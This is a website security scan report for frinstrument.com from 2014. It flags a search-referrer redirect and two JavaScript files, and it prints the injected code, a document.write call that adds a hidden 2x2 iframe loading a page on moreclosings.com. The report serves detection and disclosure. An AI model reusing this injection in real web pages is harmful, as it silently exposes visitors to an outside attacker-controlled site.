Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://frinstrument.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: frinstrument.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 31 Aug 2014 12:17:04 GMT Location: http://moreclosings.com/showthread.php?sid=128332 Server: Apache Content-Length: 299 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://frinstrument.com/ | 200 OK Content-Length: 13990 Content-Type: text/html | clean |
http://frinstrument.com/docs/assets/jquery.js | 200 OK Content-Length: 54075 Content-Type: application/javascript | clean |
http://frinstrument.com/docs/javascripts/jquery.boxy.js | 200 OK Content-Length: 20768 Content-Type: application/javascript | clean |
http://frinstrument.com/common/ChkText.js | 200 OK Content-Length: 16979 Content-Type: application/javascript | clean |
http://frinstrument.com/ORDER_JS.js | 200 OK Content-Length: 4729 Content-Type: application/javascript | clean |
http://frinstrument.com/js/l10n.js?ver=20101110 | 200 OK Content-Length: 473 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b};
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=128332 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332>
http://frinstrument.com/js/custom.js?ver=3.2.1 | 200 OK Content-Length: 15392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
jQuery(function($){ $(document).ready(function(){ $('ul.sf-menu').supersubs({ minWidth: 16, maxWidth: 40, extraWidth: 1 }) .superfish(); $('.tooltip').tipsy({fade: false, gravity: 's'}); $('#portfolio-cats a').hover(function(){ $(this).stop().animate({marginTop: '-2px'}, 300); } ,function(){ $(this).stop().animate({marginTop: '0px'}, 300); }); $('#staff-cats a').hover(function() var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=128332 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=128332>
http://frinstrument.com/js/jquery.easing.1.3.js?ver=3.2.1 | 404 Not Found Content-Length: 406 Content-Type: text/html | clean |
http://frinstrument.com/test404page.js | 404 Not Found Content-Length: 397 Content-Type: text/html | clean |
http://frinstrument.com/js/jquery.elegantcarousel.min.js?ver=3.2.1 | 404 Not Found Content-Length: 415 Content-Type: text/html | clean |
http://frinstrument.com/js/jquery.nivo.slider.js?ver=3.2.1 | 404 Not Found Content-Length: 407 Content-Type: text/html | clean |
http://frinstrument.com/js/jquerytoggle.js | 403 Forbidden Content-Length: 405 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frinstrument.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frinstrument.com/
Result: frinstrument.com is not infected or malware details are not published yet.